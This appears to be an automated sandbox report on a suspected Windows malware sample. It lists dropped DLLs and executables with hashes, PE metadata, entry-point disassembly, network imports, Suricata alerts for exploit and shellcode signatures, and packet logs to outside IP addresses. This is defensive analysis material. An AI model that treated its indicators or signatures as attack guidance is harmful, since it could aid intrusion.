Preview:	MDMP..a..... .......*..f............D...........\|...L...........lO..........T.......8...........T...........0N...............!...........#..............................................................................eJ......L$......GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1642.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8402
Entropy (8bit):	3.7040792289652194
Encrypted:	false
SSDEEP:	192:R6l7wVeJQb6cC6Y2DXplSU99HgmfEfWprj89bJKYMsfbFjm:R6lXJE6R6YabSU99HgmfEvJKYffbs
MD5:	C4516444EAD8AFDC3D39230B467B5AD7
SHA1:	8833B29409A578C74581293BD826A7DDCE75069D
SHA-256:	1CDC1E3164103A3F499D20E1A08C726C3C49035087F0E4AB3841441B47BBE8BA
SHA-512:	F055329B7F32A015C20298E74A8C977F84F8AB70205730551B5678DB35FAC808AC3F7E9EBEE978905FCEB21F6A655BA0DB9AC5E2DDE33D79FF03E698703106A6
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.0.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1662.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.520215391796147
Encrypted:	false
SSDEEP:	48:cvIwWl8zsWJg77aI9I7WpW8VYaYm8M4JKt7SFb+q8kIgc2oV+2d:uIjfsI7KK7VSJK1Y7I2oV+2d
MD5:	27BC5FDA67224C65D99BE87BF3D656B0
SHA1:	00A1E4EC5898C7B71DAC5D1659633C8FE77C9BC5
SHA-256:	59298D0F85ECBC592C6D0CF4A08444B28F16D8A799EB6A2F3B86842ED4EA7606
SHA-512:	4C35471EB94049E61EFBC7DE020FB67FF8A9E6EC742963B570376267BCE85D8FE7136FBB11A1E4565F35693C483F12F830C683AE4D7FFF45087E9AFD248747FE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="426268" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\libcurl[1].dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	38896
Entropy (8bit):	6.559102503083516
Encrypted:	false
SSDEEP:	768:CO+/dMq5EVz8TZvpEYixxqAMxkEhpdDGPrUf2hn:fYMq5kz8ppE7XIxTMUf+
MD5:	DA33AD352674B718A8B1EBBB6D77A38B
SHA1:	F2EF372864D39D4C7892F0DC3325233174B791DD
SHA-256:	045C585B661C21ECDE016C752143F4B358C3131CC01C12420454037AE0F02813
SHA-512:	79D1132D03C4E07BC11238E1E3B32447C00048732104B26CD890B161CABA92068141A50605C4A42E9B0614139D7EC786D3B52D6E1176EF0F4C828EBB4B755F01
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........wZ...4..4..4.n...4.I.5..4.I.1..4.I.0..4.I.7..4..n5..4..5..4.d.=..4.d.4..4.d....4.....4.d.6..4.Rich..4.................PE..L....).e...........!...'.....n............... ............................................@..........................%.......&..P....@...S...........\|..........T....!..p............................ ..@............ ..\|............................text...x........................... ..`.rdata..<.... ......................@..@.data........0......................@....rsrc....S...@...T...&..............@..@.reloc..T............z..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcr120[1].dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	970912
Entropy (8bit):	6.9649735952029515
Encrypted:	false
SSDEEP:	12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
MD5:	034CCADC1C073E4216E9466B720F9849
SHA1:	F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
SHA-256:	86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
SHA-512:	5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....\|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\QT2[1].exe

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1659120
Entropy (8bit):	6.598425597611016
Encrypted:	false
SSDEEP:	24576:aDPgc5j2oEEiq59Ry8naimjP/RPszWxkk9xx5x/luqxni0DRk70DRkctvdET5tG:1aiqNxaimjP/NNVrx5x/oek5tG
MD5:	5F29A3A467D2B501FFDAC96E72665B83
SHA1:	B60A014B8E99E331187723B93365E7FC76E0AB51
SHA-256:	D66DD58752E43A523759327307490D62C56A9C8F7A04CE7B8BF3F2B5C1ACEAC9
SHA-512:	1D3D6A8E85773079DDBB971E70AEC6A3F36A33FA582F65FA4B6E40AFDFEB35FDE87D568B268C3F54A802F8F352A09C5888E46F69A8B33166CAF7B94576E72DAB
Malicious:	false
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.........[............70?.......'.............to).......%.............to6.....to(.....to3.......%......................................#.......o.......&.....Rich....................PE..L....f[d.....................X....................@..........................p......H.....@..................................v...........................R...`..t.......8...............................@...............\|............................text............................... ..`.rdata..............................@..@.data...............................@....rsrc................R..............@..@.reloc..t....`......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446840
Entropy (8bit):	6.690279428020546
Encrypted:	false
SSDEEP:	12288:5mtyWf0sTWRzbpT/tD5YpsGx30h7whUgiW6QR7t5s03Ooc8dHkC2es98R:A0HsTWRzbp5D5YpsM3A7v03Ooc8dHkCh
MD5:	C766CA0482DFE588576074B9ED467E38
SHA1:	5AC975CCCE81399218AB0DD27A3EFFC5B702005E
SHA-256:	85AA8C8AB4CBF1FF9AE5C7BDE1BF6DA2E18A570E36E2D870B88536B8658C5BA8
SHA-512:	EE36BC949D627B06F11725117D568F9CF1A4D345A939D9B4C46040E96C84159FA741637EF3D73ED2D01DF988DE59A573C3574308731402EB52BAE2329D7BDDAC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.$...w...w...w.\.v...w.V@w...w..v...w...w...w..v...w..v...w..vD..w..v...w.,w...w..v...wRich...w........................PE..L....4.w.........."!...&.....z...............0.......................................=....@A.........................S......8c..........................xO.......4...U..T...........................8U..@............`..0............................text...b........................... ..`.data....&...0......................@....idata..0....`.......0..............@..@.rsrc................H..............@..@.reloc...4.......6...L..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\cximagecrt[1].dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1597304
Entropy (8bit):	6.637291537967305
Encrypted:	false
SSDEEP:	24576:gzpjfQWnxImuy/53F9F2LZFTSnvZYfHfE0jr8HDYn8HyTdUZ8:g1zQUgVDjwHcn8STW8
MD5:	66DF6F7B7A98FF750AADE522C22D239A
SHA1:	F69464FE18ED03DE597BB46482AE899F43C94617
SHA-256:	91E3035A01437B54ADDA33D424060C57320504E7E6A0C85DB2654815BA29C71F
SHA-512:	48D4513E09EDD7F270614258B2750D5E98F0DBCE671BA41A524994E96ED3DF657FCE67545153CA32D2BF7EFCB35371CAE12C4264DF9053E4EB5E6B28014ED20E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ .y.A..A..A.v.V.A...L.A...N.A...q.A...p.A.].u8A..9..A..A.A.].p.A.].M.A...J.A..A..A.].O.A.Rich.A.*................PE..L....N.Z...........!.........,.......................................................C....@..............................r...........................&..x9......tu......................................@............................................text...y........................... ..`.rdata..............................@..@.data...`........,...~..............@....rsrc...............................@..@.reloc..tu.......v..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp120[1].dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	455328
Entropy (8bit):	6.698367093574994
Encrypted:	false
SSDEEP:	12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
MD5:	FD5CABBE52272BD76007B68186EBAF00
SHA1:	EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
SHA-256:	87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
SHA-512:	1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+.N+.N+.N.3wN).N+.N..Nm.aN(.Nm.cN#.Nm.]N..Nm.\Ne.Nm.YN-.Nm.`N.Nm.gN.Nm.bN*.NRich+.N........................PE..L....\|OR.........."!.........................0.......................................x....@..........................W..L...<...<........................>.......D...................................K..@...............<............................text...<........................... ..`.data....^...0...0... ..............@....idata...............P..............@..@.rsrc................j..............@..@.reloc...D.......F...n..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91104
Entropy (8bit):	6.919609919273454
Encrypted:	false
SSDEEP:	1536:wd5wd+ywOpmlhcsrG4ckZEzH3qDLItnTwfVkC2KecbGJ13yd+zTNFZFzK:wdJywOpmlPrHI6D+nTwvlecbG/3y8XG
MD5:	9C133B18FA9ED96E1AEB2DA66E4A4F2B
SHA1:	238D34DBD80501B580587E330D4405505D5E80F2
SHA-256:	C7D9DFDDBE68CF7C6F0B595690E31A26DF4780F465D2B90B5F400F2D8D788512
SHA-512:	D2D588F9940E7E623022ADEBEBDC5AF68421A8C1024177189D11DF45481D7BFED16400958E67454C84BA97F0020DA559A8DAE2EC41950DC07E629B0FD4752E2F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................2........I..............o.......o.......o.......o.......o%......o......Rich............PE..L....s............"!...&............P........................................P...........@A........................@........ .......0...................O...@.......$..T............................#..@............ ...............................text...T........................... ..`.data...d...........................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.469031489063945
Encrypted:	false
SSDEEP:	6144:WzZfpi6ceLPx9skLmb0fXZWSP3aJG8nAgeiJRMMhA2zX4WABluuNXjDH5S5:4ZHtXZWOKnMM6bFpJj45
MD5:	D7BD65AA28BF9A4DA3E7FF31EC3AA535
SHA1:	5CFF588A60CC69BD294E32F7858B91B799DE074B
SHA-256:	13B6B3F0B399A49A37F43A706557B88E5E3D446B7AAD768920BB05FA2F480A54
SHA-512:	1E17164112AEB38D1E7C35EF19182913DB1A7EBC404989D8D2D0551096A82F7AE778B0720A5A6F37717CDD711A3160FDDBD59D5266BD0CD7BE76BBF2D1693FB0
Malicious:	false
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....t.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	6.259845390616407
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LisectAVT_2403002B_78.exe
File size:	916'089 bytes
MD5:	89d61660f3e47a8a0f7ae37d5f8f03ed
SHA1:	434a0f545d0aaafafc1bf5366f98187356e37a3a
SHA256:	31c048f58d030f9c4ba84f5bf96ea182569b1d5468e41d9f3459b58a5df580b1
SHA512:	61925a50f0aac3945bbdbd17f2dea89a4910b2c9df2326d3ff957cba5e1943ec81e53ae8f1936267e6f12ae2282fb781ddf9155ab752494c14fb90405935b070
SSDEEP:	12288:AGU2dS5bIClU2BTx5KRZ18xtSP+szdcIugOO50MMEMOkPMQBy:ptShIr3mxtSP+sJ+O5FWPPl
TLSH:	47158EC2B104C155FC3604334897BEBDE724AD618E38C59FB2947A3A59B1DB31632E7A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................t.......t.o.............t.......Rich...........

File Icon


Icon Hash:	0934343034192609

Static PE Info

General

Entrypoint:	0x409fba
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x65F90D21 [Tue Mar 19 03:57:21 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	1129ed3e7ca0eee59b4d31ab792ce61c

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
call 00007F5E7521671Ah
jmp 00007F5E75216139h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007F5E752162DBh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007F5E752162CCh
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007F5E752162CEh
add edx, 28h
cmp edx, esi
jne 00007F5E752162ACh
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F5E752162BBh
push esi
call 00007F5E75216BCDh
test eax, eax
je 00007F5E752162E2h
mov eax, dword ptr fs:[00000018h]
mov esi, 00438230h
mov edx, dword ptr [eax+04h]
jmp 00007F5E752162C6h
cmp edx, eax
je 00007F5E752162D2h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007F5E752162B2h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007F5E752162C9h
mov byte ptr [00438234h], 00000001h
call 00007F5E752169BBh
call 00007F5E75218BDFh
test al, al
jne 00007F5E752162C6h
xor al, al
pop ebp
ret
call 00007F5E75221736h
test al, al
jne 00007F5E752162CCh
push 00000000h
call 00007F5E75218BE6h
pop ecx
jmp 00007F5E752162ABh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [00438235h], 00000000h
je 00007F5E752162C6h
mov al, 01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x35e60	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x39000	0xa4b98	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xdd000	0x2a70
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xde000	0x1d24	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x33a2c	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x33a68	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x28000	0x184	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x26818	0x26a00	069323cbd6096c2dfe26414971c3c984	False	0.5521086165048543	data	6.5480366947810715	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x28000	0xe72c	0xe800	fba3d664abd52bc4ffce9198a5c25b58	False	0.5109105603448276	data	5.549848598637196	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x37000	0x1d6c	0x1000	2f8b31a80610d16b5baedfce4072667f	False	0.195068359375	DOS executable (block device driver)	3.1613628408255594	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x39000	0xa4b98	0xa4c00	5891201e166434420c09716c567a74c5	False	0.46551208033004554	data	5.950346350691132	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xde000	0x1d24	0x1e00	63d0a330e3bba8539659b6fc60e463c0	False	0.7369791666666666	data	6.468727150283101	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
EXE	0x5f610	0x7e400	PE32 executable (GUI) Intel 80386, for MS Windows	Chinese	China	0.5679648824257426
RT_ICON	0x39570	0x29d6	PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced	Chinese	China	0.8416433239962652
RT_ICON	0x3bf48	0x1305	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	Chinese	China	0.9542000410761964
RT_ICON	0x3d250	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	Chinese	China	0.02658819354075476
RT_ICON	0x4da78	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	Chinese	China	0.03726087870506622
RT_ICON	0x56f20	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	Chinese	China	0.05680207841284837
RT_ICON	0x5b148	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Chinese	China	0.07572614107883817
RT_ICON	0x5d6f0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Chinese	China	0.10436210131332083
RT_ICON	0x5e798	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Chinese	China	0.14262295081967213
RT_ICON	0x5f120	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Chinese	China	0.19946808510638298
RT_GROUP_ICON	0x5f588	0x84	data	Chinese	China	0.7121212121212122
RT_VERSION	0x39300	0x270	data	Chinese	China	0.594551282051282
RT_MANIFEST	0xdda10	0x188	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5892857142857143

Imports

DLL	Import
KERNEL32.dll	SetPriorityClass, VirtualFree, GetCurrentProcess, VirtualAlloc, SetThreadPriority, Sleep, GetCurrentThread, GetSystemInfo, ExitProcess, GlobalMemoryStatusEx, GetConsoleWindow, CreateDirectoryA, WriteConsoleW, HeapSize, CreateFileW, GetProcessHeap, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, GetStringTypeW, GetCPInfo, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, TerminateProcess, RtlUnwind, RaiseException, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetCommandLineA, GetCommandLineW, GetStdHandle, WriteFile, GetModuleFileNameW, GetModuleHandleExW, GetFileSizeEx, SetFilePointerEx, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, HeapFree, CloseHandle, HeapAlloc, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ReadFile, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, SetEndOfFile
USER32.dll	ShowWindow
SHELL32.dll	SHChangeNotify, ShellExecuteA
WININET.dll	InternetCloseHandle, InternetOpenA, InternetReadFile, InternetOpenUrlA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T11:26:05.385881+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49725	443	192.168.2.6	52.168.117.173
2024-07-25T11:26:28.058059+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49727	20.114.59.183	192.168.2.6
2024-07-25T11:25:42.841407+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	443	49714	43.152.64.193	192.168.2.6
2024-07-25T11:25:50.311485+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49717	20.114.59.183	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 11:25:33.832099915 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:33.832140923 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:33.832264900 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:33.848781109 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:33.848809004 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:35.247145891 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:35.247272015 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:35.247917891 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:35.248095989 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:35.479018927 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:35.479054928 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:35.479456902 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:35.479528904 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:35.533324003 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:35.576507092 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:36.945822001 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:36.945887089 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:36.945894957 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:36.945930004 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:36.945955992 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:36.945982933 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:36.945996046 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:36.946033955 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.035761118 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.035804987 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.035881996 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.035907984 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.035943985 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.035959005 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.038045883 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.038290024 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.038306952 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.038347006 CEST	49711	443	192.168.2.6	43.152.64.193
